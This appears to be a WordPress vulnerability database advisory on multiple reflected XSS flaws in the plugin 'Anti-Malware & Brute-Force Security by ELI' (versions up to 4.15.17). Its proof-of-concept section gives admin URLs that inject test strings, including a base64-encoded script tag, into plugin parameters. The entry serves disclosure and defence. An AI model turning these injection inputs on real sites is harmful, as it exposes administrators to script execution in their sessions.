Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS

2015-05-15T00:00:00
ID WPVDB-ID:7989
Type wpvulndb
Reporter Tim Coen
Modified 2019-10-21T00:00:00

Description

WordPress Vulnerability - Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS

PoC

http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS;_msg=xsstest http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&scan;_what=1&scan;_type=xsstest http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS;_fixing=2&GOTMLS;_fix[]=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==